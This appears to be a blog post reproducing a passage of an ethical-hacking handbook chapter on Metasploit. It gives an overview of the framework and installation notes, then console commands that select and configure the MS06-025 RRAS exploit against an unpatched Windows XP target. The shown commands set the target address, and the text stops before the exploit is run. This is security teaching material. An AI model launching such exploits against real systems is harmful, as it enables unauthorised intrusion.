Penetration Testing

Penetration Testing
and Tools

Chapter 4 Using Metasploit


CHAPTER 4 Using Metasploit

This chapter will show you how to use Metasploit, an exploit launching and development
platform.
• Metasploit: the big picture
• Getting Metasploit
• Using the Metasploit console to launch exploits
• Using Metasploit to exploit client-side vulnerabilities
• Using the Metasploit Meterpreter
• Using Metasploit as a man-in-the-middle password stealer
• Using Metasploit to auto-attack
• Inside Metasploit exploit modules

Metasploit: The Big Picture
Metasploit is a free, downloadable tool that makes it very easy to acquire, develop, and
launch exploits for computer software vulnerabilities. It ships with professional-grade
exploits for hundreds of known software vulnerabilities. When H.D. Moore released
Metasploit in 2003, it permanently changed the computer security scene. Suddenly, anyone
could become a hacker and everyone had access to exploits for unpatched and
recently patched vulnerabilities. Software vendors could no longer drag their feet fixing
publicly disclosed vulnerabilities, because the Metasploit crew was hard at work developing
exploits that would be released for all Metasploit users.
Metasploit was originally designed as an exploit development platform, and we’ll use
it later in the book to show you how to develop exploits. However, it is probably more
often used today by security professionals and hobbyists as a “point, click, root” environment
to launch exploits included with the framework.
We’ll spend the majority of this chapter showing Metasploit examples. To save space,
we’ll strategically snip out nonessential text, so the output you see while following along
might not be identical to what you see in this book. Most of the chapter examples will be
from Metasploit running on the Windows platform inside the Cygwin environment.
Getting Metasploit
Metasploit runs natively on Linux, BSD, Mac OS X, and Windows inside Cygwin. You
can enlist in the development source tree to get the very latest copy of the framework, or

Gray Hat Hacking: The Ethical Hacker’s Handbook

just use the packaged installers from http://framework.metasploit.com/msf/download.
The Windows console application (msfconsole) that we will be using throughout this
chapter requires the Cygwin environment to run. The Windows package comes with an
AJAX browser-based interface (msfweb) which is okay for light usage, but you’ll eventually
want to install Cygwin to use the console in Windows. The Cygwin downloader is
www.cygwin.com/setup.exe. Be sure to install at least the following, in addition to the
base packages:
• Devel readline, ruby, and subversion (required for msfupdate)
• Interpreters ruby
• Libs readline
• Net openssl

References
Installing Metasploit on Windows http://metasploit.com/dev/trac/wiki/Metasploit3/
InstallWindows
Installing Metasploit on Mac OS X http://metasploit.com/dev/trac/wiki/Metasploit3/
InstallMacOSX
Installing Metasploit on Gentoo http://metasploit.com/dev/trac/wiki/Metasploit3/
InstallGentoo
Installing Metasploit on Ubuntu http://metasploit.com/dev/trac/wiki/Metasploit3/
InstallUbuntu
Installing Metasploit on Fedora http://metasploit.com/dev/trac/wiki/Metasploit3/
InstallFedora
Using the Metasploit Console to Launch Exploits
Our first demo in the tour of Metasploit will be to exploit an unpatched XP Service Pack
1 machine missing the RRAS security update (MS06-025).We’ll try to get a remote command
shell running on that box using the RRAS exploit built into the Metasploit framework.
Metasploit can pair any Windows exploit with any Windows payload. So we can
choose to use the RRAS vulnerability to open a command shell, create an administrator,


start a remote VNC session, or to do a bunch of other stuff. Let’s get started.
$ ./msfconsole
_ _
_ | | (_)_
____ ____| |_ ____ ___ ____ | | ___ _| |_
| \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
|_|
=[ msf v3.0
+ -- --=[ 177 exploits - 104 payloads
+ -- --=[ 17 encoders - 5 nops
=[ 30 aux
msf >

Chapter 4: Using Metasploit


PART II
The interesting commands to start with are
show
info
use
Other commands can be found by typing help. Our first task will be to find the name
of the RRAS exploit so we can use it:

msf > show exploits
Exploits
========
Name Description
---- -----------
...
windows/smb/ms04_011_lsass Microsoft LSASS Service
DsRolerUpgradeDownlevelServer Overflow
windows/smb/ms04_031_netdde Microsoft NetDDE Service
Overflow
windows/smb/ms05_039_pnp Microsoft Plug and Play Service
Overflow
windows/smb/ms06_025_rasmans_reg Microsoft RRAS Service RASMAN
Registry Overflow
windows/smb/ms06_025_rras Microsoft RRAS Service Overflow
windows/smb/ms06_040_netapi Microsoft Server Service
NetpwPathCanonicalize Overflow

There it is! Metasploit calls it windows/smb/ms06_025_rras. We’ll use that exploit
and then go looking for all the options needed to make the exploit work.
msf > use windows/smb/ms06_025_rras
msf exploit(ms06_025_rras) >
Notice that the prompt changes to enter “exploit mode” when you use an exploit
module. Any options or variables you set while configuring this exploit will be retained
so you don’t have to reset the options every time you run it. You can get back to the original
launch state at the main console by issuing the back command.
msf exploit(ms06_025_rras) > back
msf > use windows/smb/ms06_025_rras
msf exploit(ms06_025_rras) >
Different exploits have different options. Let’s see what options need to be set to
make the RRAS exploit work.
msf exploit(ms06_025_rras) > show options


Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE ROUTER yes The pipe name to use (ROUTER, SRVSVC)
Gray Hat Hacking: The Ethical Hacker’s Handbook
78
This exploit requires a target address, the port number SMB (server message block)
uses to listen, and the name of the pipe exposing this functionality.
msf exploit(ms06_025_rras) > set RHOST 192.168.1.220
RHOST => 192.168.1.220
As you can see, the syntax to set an option is
set

0 Response to "Penetration Testing"

Post a Comment